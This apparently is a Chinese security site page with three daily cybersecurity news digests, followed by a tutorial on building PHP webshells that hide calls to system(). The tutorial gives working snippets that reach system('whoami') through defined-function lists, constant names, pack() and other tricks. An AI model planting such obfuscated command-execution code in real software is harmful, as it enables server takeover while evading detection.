1、XwormRAT恶意软件利用隐写技术传播 https://asec.ahnlab.com/ko/88785/ 安全研究机构通过其“电子邮件蜜罐系统”发现,XwormRAT恶意软件正在使用隐写技术进行传播。该恶意软件以VBScript和JavaScript为起始代码,将恶意脚本插入正常代码中,使用户难以识别。脚本会调用包含PowerShell脚本的代码,下载并执行最终恶意软件。与过去版本相比,当前版本的脚本会从JPG图像末尾的位图像素数据中提取RGB值进行解码。安全专家提醒用户在打开未知来源的电子邮件时需格外小心,同时提供了相关MD5哈希和恶意网址作为威胁情报。 2、黑客滥用Inno Setup传播恶意软件 https://www.splunk.com/en_us/blog/security/inno-setup-malware-redline-stealer-campaign.html 研究人员发现网络犯罪分子利用合法的Inno Setup安装程序框架作为恶意软件传播工具。攻击者通过Pascal脚本功能创建看似合法的安装程序,隐藏多阶段恶意软件负载,最终部署RedLine Stealer信息窃取恶意软件。该攻击利用XOR加密、WMI查询、文件名模式匹配、系统分析等技术,绕过安全工具和沙盒检测,并通过计划任务和DLL侧加载实现持久化。这种攻击策略利用了用户对合法安装程序的信任,通过网络钓鱼、恶意 3、新型网络钓鱼冒充DWP窃取信用卡数据 https://cybersecuritynews.com/new-phishing-attack-impersonates-as-dwp/ 研究人员发现2025年5月下旬起,一场复杂的网络钓鱼活动在英国出现,攻击者伪装成工作和养老金部(DWP)发送欺诈短信,警告收件人错过冬季取暖补贴申请,诱导其点击短链接进入虚假网站。该活动利用人们对政府福利的担忧,尤其针对弱势群体,高峰期在6月下半月。攻击者通过缩短URL和域名伪装技术,创建与官方DWP网站极为相似的页面,收集受害者信用卡、银行信息及身份验证数据。专家警告公众警惕此类攻击,避免点击可疑链接。 4、Redis被曝三大严重安全漏洞,PoC代码已公开 https://www.freebuf.com/articles/438102.html Redis数据库被曝存在严重安全漏洞,攻击者可利用该漏洞实现远程代码执行(RCE)。目前相关概念验证(PoC)代码已在安全社区流传。漏洞涉及HyperLogLog(HLL)数据结构实现问题,编号为CVE-2024-51741和CVE-2024-46981。 5、高危Lucee漏洞通过计划任务滥用实现认证RCE https://www.freebuf.com/news/437930.html Lucee应用服务器曝高危漏洞CVE-2025-34074(CVSS 9.4),允许认证管理员通过计划任务功能执行任意远程代码,影响所有版本。建议立即限制管理界面访问、审计任务、监控文件变更并应用补丁。 6、Tomcat与Camel高危RCE漏洞引发数千次利用尝试 https://securityonline.info/apache-under-attack-critical-rce-flaws-in-tomcat-camel-spark-thousands-of-exploit-attempts/ Apache Tomcat和Camel关键RCE漏洞(CVE-2025-24813等)遭全球攻击激增,3月超12万次利用尝试。攻击者可劫持系统执行任意代码,利用PUT请求缺陷或HTTP头部过滤漏洞。建议禁用Tomcat部分功能、严格校验Camel输入并立即更新补丁。 7、40余款恶意火狐扩展瞄准加密货币钱包窃取用户资产 https://thehackernews.com/2025/07/over-40-malicious-firefox-extensions.html 40余款恶意Firefox扩展伪装主流钱包工具窃取加密货币密钥,伪造好评提升可信度,部分篡改开源代码植入恶意功能。攻击者或来自俄语国家,Mozilla已下架多数扩展并开发检测系统。建议仅安装已验证扩展并定期检查行为。 8、微软Edge修复正被积极利用的Chromium漏洞 https://cybersecuritynews.com/microsoft-edge-chromium-vulnerability/ 微软紧急发布Edge 138.0.3351.65版本,修复正被利用的高危漏洞CVE-2025-6554和CVE-2025-49713,可能导致任意代码执行和数据泄露,用户须立即更新。 9、PHP高危漏洞预警威胁PHP应用安全 https://securityonline.info/php-flaws-cve-2025-1735-sqli-crash-cve-2025-6491-soap-dos-threaten-php-apps/ 发现两个高危PHP漏洞:CVE-2025-1735(SQL注入和系统崩溃)和CVE-2025-6491(SOAP协议DoS攻击),影响PostgreSQL组件和SOAP应用,需紧急修复。 10、黑客利用伪造Cloudflare验证界面诱导用户执行恶意软件 https://cybersecuritynews.com/hackers-use-fake-cloudflare-verification-screen/ 黑客伪造Cloudflare验证界面分发恶意软件,利用用户对安全服务的信任,通过多阶段攻击注入PowerShell代码,规避检测并保持零检出率,凸显行为分析防御的紧迫性。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2025年07月07日
1、研究人员披露针对Android攻击行动IconAds https://www.humansecurity.com/learn/blog/satori-threat-intelligence-alert-iconads/ 安全研究团队发现并破获了名为IconAds的攻击行动。该行动涉及352款应用,这些应用会在用户屏幕上加载与上下文无关的广告,并隐藏应用图标,使用户难以识别和移除违规应用。IconAds攻击高峰期每天处理12亿次竞价请求,其相关流量遍布全球,主要来源是巴西、墨西哥和美国。研究人员分析发现,IconAds应用程序采用分层混淆策略、命令与控制通信模式以及恶意活动别名等手段来隐藏其活动和自身。Google已从Google Play中移除 2、Wing FTP服务器漏洞致攻击者可完全接管 https://gbhackers.com/wing-ftp-server-vulnerability/ 一个严重漏洞在Wing FTP Server中被披露,该漏洞编号为CVE-2025-47812,CVSSv4评分高达10.0,表明其极高的危险性和易被利用性。该漏洞影响Wing FTP Server 7.4.3及更高版本。漏洞源于/loginok.html端点在处理用户名参数时对NULL字节的处理不当,攻击者可借此注入任意Lua代码至用户会话文件,进而实现未经身份验证的远程代码执行,完全接管服务器。由于Wing FTP在Linux上默认以root权限运行,在Windows上默认以NT A 3、ModSecurity WAF漏洞致DoS攻击风险 https://gbhackers.com/critical-bug-in-modsecurity-waf/ ModSecurity,一种广泛使用的开源Web应用程序防火墙(WAF),近期被披露存在一个漏洞,该漏洞可能导致服务器遭受拒绝服务(DoS)攻击。该漏洞编号为CVE-2025-52891,影响ModSecurity 2.9.8至2.9.10版本,CVSS v3基本评分为6.5,属于中等严重程度。攻击者可利用此漏洞反复发送特制的XML有效负载,摧毁WAF,进而使受保护的Web应用程序面临进一步攻击风险。该漏洞仅影响mod_security2,不影响libmodsecurity3库。默认 4、Grafana发布图像渲染器插件关键安全更新 https://www.bleepingcomputer.com/news/security/grafana-releases-critical-security-update-for-image-renderer-plugin/ Grafana Labs发布了针对Grafana图像渲染器插件和合成监控代理的关键安全更新,解决了四个Chromium漏洞。尽管这些问题两周前已在开源项目中修复,但Grafana收到安全研究员提交的漏洞赏金报告,证明Grafana组件中的漏洞可被利用。受影响的版本包括3.12.9之前的Grafana Image Renderer版本和0.38.3之前的Synthe 5、攻击者利用暴露JDWP部署加密货币挖矿程序 https://www.wiz.io/blog/exposed-jdwp-exploited-in-the-wild 研究团队发现攻击者利用暴露的Java调试线协议(JDWP)接口,对运行TeamCity的蜜罐服务器实施攻击。攻击者通过JDWP实现远程代码执行,部署了定制的XMRig加密货币挖矿程序,并设置了多种持久化机制。此次攻击显示了JDWP暴露的高风险性,攻击者在暴露机器后几小时内完成恶意软件部署,并通过代理隐藏钱包地址以躲避调查。研究团队提醒,JDWP默认无身份验证,暴露在互联网上极易被攻击,许多开发环境中的应用程序(如 TeamCity、Jenkins 等)在调试模式下会自动启动 6、Apache Tomcat和Camel漏洞遭全球恶意利用 https://unit42.paloaltonetworks.com/apache-cve-2025-24813-cve-2025-27636-cve-2025-29891/ 自2025年3月披露以来,Apache Tomcat和Apache Camel中的严重漏洞正被全球网络犯罪分子积极利用。安全研究人员记录了来自70多个国家的超过12.5万次攻击尝试。这些漏洞(CVE-2025-24813影响Tomcat,CVE-2025-27636和CVE-2025-29891影响Camel)可导致远程代码执行,对广泛部署的基于Java的平台构成重大风险。Tomcat漏洞利用了部分PUT功能与会话持 7、西班牙警方捣毁涉案金额超1000万欧元投资诈骗团伙 https://www.bleepingcomputer.com/news/legal/police-dismantles-investment-fraud-ring-stealing-10-million/ 2025年7月3日,西班牙警方成功破获一起大规模投资诈骗团伙,累计损失达1180万美元(约1000万欧元)。此次行动逮捕了21名嫌疑人,并没收了七辆豪华汽车及超过150万美元、130万欧元的现金和加密货币。诈骗团伙自2022年起实施诈骗,通过虚假的顾问和操纵的网站诱骗受害者进行虚假投资。他们设立空壳投资公司,通过社交媒体吸引受害者,提供对知名公司和加密货币的投资机会。诈骗手法类似于“爱 8、新型RondoDox僵尸网络攻击多款路由器 https://www.fortinet.com/blog/threat-research/rondobox-unveiled-breaking-down-a-botnet-threat 发现了一个名为RondoDox的新型僵尸网络,利用两个高危漏洞(CVE-2024-3721 和 CVE-2024-12856)攻击TBK DVR和Four-Faith路由器。该僵尸网络通过混淆配置数据、模仿合法流量和多层持久化机制逃避检测,并能够发起DDoS攻击。RondoDox的攻击范围已扩展到多种Linux架构,包括ARM、MIPS、Intel 80386等。研究人员建议用户及时修补漏洞,并通过持续监控 9、诈骗者冒充“美国政府效率部”窃取个人信息 https://fedscoop.com/doge-email-scam-personal-information/ 研究人员揭露了一个新型诈骗活动,诈骗者冒充“政府效率部”(DOGE)的代理,试图窃取个人信息。该诈骗活动利用了人们对DOGE(狗狗币)的混淆以及对政府补偿计划的关注。诈骗邮件声称收件人可以获得退税,并要求填写包含敏感信息的PDF申请表。这些邮件已发送至近1800个电子邮件地址和350多个组织,涉及高校、交通部门和政府机构。诈骗者通过WhatsApp与受害者互动,并声称代表联邦政府发放补偿。白宫已证实这些邮件并非来自政府。美国人事管理办公室和网络安全和基础设施安全局(CISA) 10、黑客声称入侵西班牙电信公司并泄露数据 https://www.bleepingcomputer.com/news/security/hacker-leaks-telef-nica-data-allegedly-stolen-in-a-new-breach 近日,一名自称“Rey”的黑客声称从西班牙电信公司Telefónica窃取了106GB数据,并已泄露部分数据作为证据。据黑客所述,此次入侵发生在5月30日,他们在被发现前已连续12小时窃取数据。黑客组织Hellcat曾于1月通过Jira服务器入侵Telefónica,此次入侵可能因Jira配置错误导致。黑客声称已窃取385,311个文件,包括内部通信、采购订单、客户记录和员工数 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2025年07月04日
1、德国全面封杀DeepSeek,中欧数据冲突升级 https://www.freebuf.com/articles/437663.html 近日,德国柏林数据保护专员正式要求苹果与谷歌公司将DeepSeek从二者的应用商店中下架,理由是DeepSeek涉嫌严重违反《欧盟通用数据保护条例》(GDPR),并可能导致德国公民个人信息被非法转移至中国。 2、WordPress 表单插件高危漏洞威胁超60万网站安全 https://www.freebuf.com/articles/web/437532.html 热门WordPress表单插件Forminator被曝存在严重的任意文件删除漏洞(CVE-2025-6463,CVSS评分8.8),全球超过60万个活跃安装站点面临风险。该漏洞允许未认证攻击者删除包括wp-config.php在内的关键系统文件,可能导致网站完全被接管及远程代码执行。 3、思科修复统一通信管理器静态SSH root凭证高危漏洞 https://www.freebuf.com/articles/system/437600.html 数字通信技术巨头思科(Cisco)近日修复了其统一通信管理器(Unified Communications Manager,简称Unified CM)中存在的一个静态SSH凭证漏洞。该漏洞编号为CVE-2025-20309(CVSS评分为10分),存在于思科统一通信管理器及其会话管理版(Session Management Edition)中,允许远程攻击者使用开发阶段设置的硬编码root凭证登录系统。思科统一通信管理器(CUCM)是思科开发的企业级语音、视频、消息和移动通信呼叫处理系统。 4、基于Telegram的安卓短信窃取程序已感染10万台设备 https://www.freebuf.com/articles/endpoint/437611.html 网络安全公司Group-IB最新发现一个名为Qwizzserial的新型安卓恶意软件家族正在乌兹别克斯坦肆虐,通过利用该国对短信双重认证(2FA)的依赖,窃取了数千名移动用户的敏感财务数据。Qwizzserial代表了新一代安卓恶意软件攻击活动,其特点是利用Telegram机器人自动生成并分发恶意APK文件,使网络犯罪分子能够发起高度可扩展的本地化攻击。研究报告指出:"这项研究揭露了此前未知的安卓短信窃取程序家族...根据其主活动组件的Java包名将其命名为Qwizzserial"。 5、朝鲜黑客利用Nim恶意软件攻击Web3加密平台 https://www.sentinelone.com/labs/macos-nimdoor-dprk-threat-actors-target-web3-and-crypto-platforms-with-nim-based-malware/ 朝鲜威胁行为体正在通过基于Nim语言编写的恶意软件,针对Web3和加密相关企业发起攻击。这种恶意软件通过进程注入技术和加密的WebSocket协议进行远程通信,具有独特的持久性机制,能够在系统重启或恶意软件终止时持续存在。此次攻击链由多个复杂的脚本和二进制文件组成,结合了C++与Nim编写的组件,形成了新的攻击模式。研究者指出,朝鲜威胁者在攻击中采用 6、Firefox出现多个恶意插件威胁加密货币安全 https://blog.koi.security/foxywallet-40-malicious-firefox-extensions-exposed-4c14419de486 研究团队发现了一场针对Firefox浏览器的恶意活动。该活动涉及40多个恶意扩展程序,这些扩展程序伪装成知名加密货币钱包工具,目的是窃取用户钱包凭证,使用户的资产面临风险。从2025年4月开始,该活动一直处于活跃状态,且新的恶意扩展程序还在不断被上传至Firefox附加组件商店。这些恶意扩展程序通过夸大评论、模仿品牌等手段来赢得用户的信任,诱导用户安装。虽然目前还不能确定该活动的具体归因,但有迹象表明其可能与俄语威 7、PDF成为网络钓鱼攻击的热门传播媒介 https://blog.talosintelligence.com/pdfs-portable-documents-or-perfect-deliveries-for-phish/ 近日,安全研究机构发布了一项关于电子邮件品牌冒充检测引擎的更新,旨在增强对利用PDF有效载荷的网络钓鱼攻击的检测能力。研究显示,许多带有PDF附件的恶意电子邮件通过诱导受害者拨打对手控制的电话号码实施“电话导向攻击”(TOAD),即回拨网络钓鱼。这种攻击手法利用VoIP号码,难以追踪并增强了攻击的隐蔽性。研究指出,攻击者常常嵌入品牌徽标,利用知名品牌的信誉欺骗受害者,甚至在PDF中隐藏恶意链接和二维码。近期观察 8、伊朗黑客“罗伯特”威胁曝光特朗普团队邮件 https://www.govinfosecurity.com/irans-robert-hack-targets-trump-tests-us-cyber-gaps-a-28887 与伊朗有关的黑客组织“罗伯特”声称已窃取了约100GB来自特朗普核心圈子的电子邮件,涉及白宫办公厅主任苏西·威尔斯、特朗普律师林赛·哈利根、顾问罗杰·斯通以及成人电影明星斯托米·丹尼尔斯等。该组织曾于2024年美国总统大选前泄露过特朗普团队的邮件,部分邮件内容已被路透社证实。此次,黑客组织威胁要出售这些邮件,但未透露具体计划。美国司法部和联邦调查局已对此事展开调查,并警告任何涉及国家安全泄密的行为都将受到法律严 9、工信部印发《关于开展号码保护服务业务试点的通知》 https://www.secrss.com/articles/80478 工业和信息化部近日印发通知,部署开展号码保护服务业务试点工作。明确号码保护服务业务由应用平台提供方、基础平台提供方和业务使用方三者协同开展。为满足开展号码保护服务业务的码号资源需求,并与固定、移动用户号码明显区分,便于用户识别,工业和信息化部规划700号段作为号码保护服务业务的专用码号资源,管理位长11位,使用位长15位。要求各业务参与方严格遵守码号资源管理、防范治理电信网络诈骗、实名制、非应邀商业电子信息防控等各项规定,制定本企业相关落实措施,建立完善相关技术手段,加强业务和安全管理。 10、交行等5家银行因数据安全问题被罚,央行数据安全管理办法已施行 https://www.secrss.com/articles/80462 《银行科技研究社》(作者 木子剑):近日,有5家银行因数据安全相关问题被罚,涉及1家国有银行、3家农商行、1家村镇银行。2025年5月初,中国人民银行发布《中国人民银行业务领域数据安全管理办法》,已于近日(6月30日)起施行。其旨在指导督促金融从业机构依法依规开展涉及货币信贷、宏观审慎、跨境人民币、银行间市场、金融业综合统计、支付清算、人民币发行流通、经理国库、征信和信用评级、反洗钱等中国人民银行业务领域数据处理活动。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
浅谈 webshell 构造之如何获取恶意函数
前言 这篇文章主要是总结一下自己学习过的 “恶意函数” 篇章,重点是在如何获取恶意函数。 get_defined_functions (PHP 4 >= 4.0.4, PHP 5, PHP 7, PHP 8) get_defined_functions — 返回所有已定义函数的数组 我们主要是可以通过这个获取危险的函数 比如 比如 当然还有许多,如何执行命令就很简单了 代码如下 <?php $a=(get_defined_functions()); $a["internal"][516]("whoami"); ?> get_defined_constants get_defined_constants — 返回所有常量的关联数组,键是常量名,值是常量值 那获取的常量是不是可以为我们所用呢? 可以看到是有 system 关键字的,我们就可以直接去获取它的 key,然后截取不就是 system 了吗 代码如下 <?php $a=get_defined_constants(); foreach ($a as $key => $value){    if (substr($key,0,7)=="INI_SYS"){        $x= strtolower(substr($key,4,6));        $x("whoami");   } } ?> 自定义方法 通过自定义的方法,从毫无头绪的数字获取到 system 函数,拿出广为流传的例子 <?php function fun($a){    $s = ['a','t','s', 'y', 'm', 'e', '/'];    $tmp = "";    while ($a>10) {        $tmp .= $s[$a%10];        $a = $a/10;   }    return $tmp.$s[$a]; } 现在还没有看出端倪,但是当你运行这串代码的时候 <?php function fun($a){    $s = ['a','t','s', 'y', 'm', 'e', '/'];    $tmp = "";    while ($a>10) {        $tmp .= $s[$a%10];        $a = $a/10;   }    return $tmp.$s[$a]; } echo fun(451232); 抛出异常截取字符串 这个手法也是比较特殊的 我们可以随便找一个异常类 比如 ParseError,然后再加上我们刚刚的自定义方法 ParseError 当解析 PHP 代码时发生错误时抛出,比如当 https://www.php.net/manual/zh/function.eval.php 被调用出错时。 它的一些属性和方法 /* 继承的属性 */ protected string $message = ""; private string $string = ""; protected int $code; protected string $file = ""; protected int $line; private array $trace = []; private ?Throwable $previous = null; /* 继承的方法 */ public Error::__construct(string $message = "", int $code = 0, ?Throwable $previous = null) final public Error::getMessage(): string final public Error::getPrevious(): ?Throwable final public Error::getCode(): int final public Error::getFile(): string final public Error::getLine(): int final public Error::getTrace(): array final public Error::getTraceAsString(): string public Error::__toString(): string private Error::__clone(): void 可以看到都是基础父类的 Exception::__construct — 异常构造函数 Exception::getMessage — 获取异常消息内容 Exception::getPrevious — 返回前一个 Throwable Exception::getCode — 获取异常代码 Exception::getFile — 创建异常时的程序文件名称 Exception::getLine — 获取创建的异常所在文件中的行号 Exception::getTrace — 获取异常追踪信息 Exception::getTraceAsString — 获取字符串类型的异常追踪信息 Exception::__toString — 将异常对象转换为字符串 Exception::__clone — 异常克隆 根据这些思路来了,我们如果能够获取报错内容,那不就是隐含的获取了恶意函数吗 代码如下 <?php function fun($a){    $s = ['a','t','s', 'y', 'm', 'e', '/'];    $tmp = "";    while ($a>10) {        $tmp .= $s[$a%10];        $a = $a/10;   }    return $tmp.$s[$a]; } $a = new ParseError(fun(451232)); echo $a->getMessage(); DirectoryIterator The DirectoryIterator class provides a simple interface for viewing the contents of filesystem directories. 它的一些方法 https://www.php.net/manual/zh/directoryiterator.construct.php — Constructs a new directory iterator from a path https://www.php.net/manual/zh/directoryiterator.current.php — Return the current DirectoryIterator item https://www.php.net/manual/zh/directoryiterator.getbasename.php — Get base name of current DirectoryIterator item https://www.php.net/manual/zh/directoryiterator.getextension.php — Gets the file extension https://www.php.net/manual/zh/directoryiterator.getfilename.php — Return file name of current DirectoryIterator item https://www.php.net/manual/zh/directoryiterator.isdot.php — Determine if current DirectoryIterator item is '.' or '..' https://www.php.net/manual/zh/directoryiterator.key.php — Return the key for the current DirectoryIterator item https://www.php.net/manual/zh/directoryiterator.next.php — Move forward to next DirectoryIterator item https://www.php.net/manual/zh/directoryiterator.rewind.php — Rewind the DirectoryIterator back to the start https://www.php.net/manual/zh/directoryiterator.seek.php — Seek to a DirectoryIterator item https://www.php.net/manual/zh/directoryiterator.tostring.php — Get file name as a string https://www.php.net/manual/zh/directoryiterator.valid.php — Check whether current DirectoryIterator position is a valid file 其中大概看一下,其实 DirectoryIterator::getFilename 就有利用的可能 DirectoryIterator::getFilename — Return file name of current DirectoryIterator item 看一下官方的例子 <?php$dir = new DirectoryIterator(dirname(__FILE__));foreach ($dir as $fileinfo) {   echo $fileinfo->getFilename() . "\n";}?> 以上示例的输出类似于: . .. apple.jpg banana.jpg index.php pear.jpg 那岂不是我们如果可以控制自己的文件名或者目录,那不就构造出来了吗 代码如下 <?php // 创建FilesystemIterator实例 $iterator = new FilesystemIterator(dirname(__FILE__)); foreach ($iterator as $item) {    // 输出文件和目录的属性    echo $item->getFilename() . "\n"; } ?> 运行结果 确实是获取到了 pack 这个函数很有意思的 pack — 将数据打包成二进制字符串 可以构造出字符串 pack(https://www.php.net/manual/zh/language.types.string.php $format, https://www.php.net/manual/zh/language.types.mixed.php ...$values): https://www.php.net/manual/zh/language.types.string.php 将输入参数打包成 format 格式的二进制字符串。 这个函数的思想来自 Perl,所有格式化代码(format)的工作原理都与 Perl 相同。但是,缺少了部分格式代码,比如 Perl 的 “u”。 注意,有符号值和无符号值之间的区别只影响函数 https://www.php.net/manual/zh/function.unpack.php,在那些使用有符号和无符号格式代码的地方 pack() 函数产生相同的结果。 看了一下大概,再看下官方的例子 这是一些它的格式 示例 #1 *pack()* 范例 <?php$binarydata = pack("nvc*", 0x1234, 0x5678, 65, 66);?> 输出结果为长度为 6 字节的二进制字符串,包含以下序列 0x12, 0x34, 0x78, 0x56, 0x41, 0x42。 那我们按照构造出 system 的思路 <?php echo pack("C6", 115, 121, 115, 116, 101, 109); echo pack("H*", "73797374656d"); ?> 这两个结果都是 system "C6" 是格式字符串,其中 C 表示将后续的六个参数视为无符号字符(即 ASCII 字符),6 表示有六个字符。 传入的参数 115, 121, 115, 116, 101, 109 是 ASCII 码值。 115 对应的字符是 s 121 对应的字符是 y 115 对应的字符是 s 116 对应的字符是 t 101 对应的字符是 e 109 对应的字符是 m 构造出来的就是 system "H*" 是格式字符串,其中 H 表示将后续传递的参数视为十六进制字符串,* 表示任意长度。 73797374656d 是一个十六进制表示的字符串。将其转换为 ASCII 字符: 73 是 s 79 是 y 73 是 s 74 是 t 65 是 e 6d 是 m 构造出来的也是system
第2页 第3页 第4页 第5页 第6页 第7页 第8页 第9页 第10页 第11页 第12页 第13页 第14页 第15页 第16页 第17页 第18页 第19页 第20页 第21页 第22页 第23页 第24页 第25页 第26页 第27页 第28页 第29页 第30页 第31页 第32页 第33页 第34页 第35页 第36页 第37页 第38页 第39页 第40页 第41页 第42页 第43页 第44页 第45页 第46页 第47页 第48页 第49页 第50页 第51页 第52页 第53页 第54页 第55页 第56页 第57页 第58页 第59页 第60页 第61页 第62页 第63页 第64页 第65页 第66页 第67页 第68页 第69页 第70页 第71页 第72页 第73页 第74页 第75页 第76页 第77页 第78页 第79页 第80页 第81页 第82页 第83页 第84页 第85页 第86页 第87页 第88页 第89页 第90页 第91页 第92页 第93页 第94页 第95页 第96页 第97页 第98页 第99页 第100页 第101页 第102页 第103页 第104页 第105页 第106页 第107页 第108页 第109页 第110页 第111页 第112页 第113页 第114页 第115页 第116页 第117页 第118页 第119页 第120页 第121页 第122页 第123页 第124页 第125页 第126页 第127页 第128页 第129页 第130页 第131页 第132页 第133页 第134页 第135页 第136页 第137页 第138页 第139页 第140页 第141页 第142页 第143页 第144页 第145页 第146页 第147页 第148页 第149页 第150页 第151页 第152页 第153页 第154页 第155页 第156页 第157页 第158页 第159页 第160页 第161页 第162页 第163页 第164页 第165页 第166页 第167页 第168页 第169页 第170页 第171页 第172页 第173页 第174页 第175页 第176页 第177页 第178页 第179页 第180页 第181页 第182页 第183页 第184页 第185页 第186页 第187页 第188页 第189页 第190页 第191页 第192页 第193页 第194页 第195页 第196页 第197页 第198页 第199页 第200页 第201页 第202页 第203页 第204页 第205页 第206页 第207页 第208页 第209页 第210页 第211页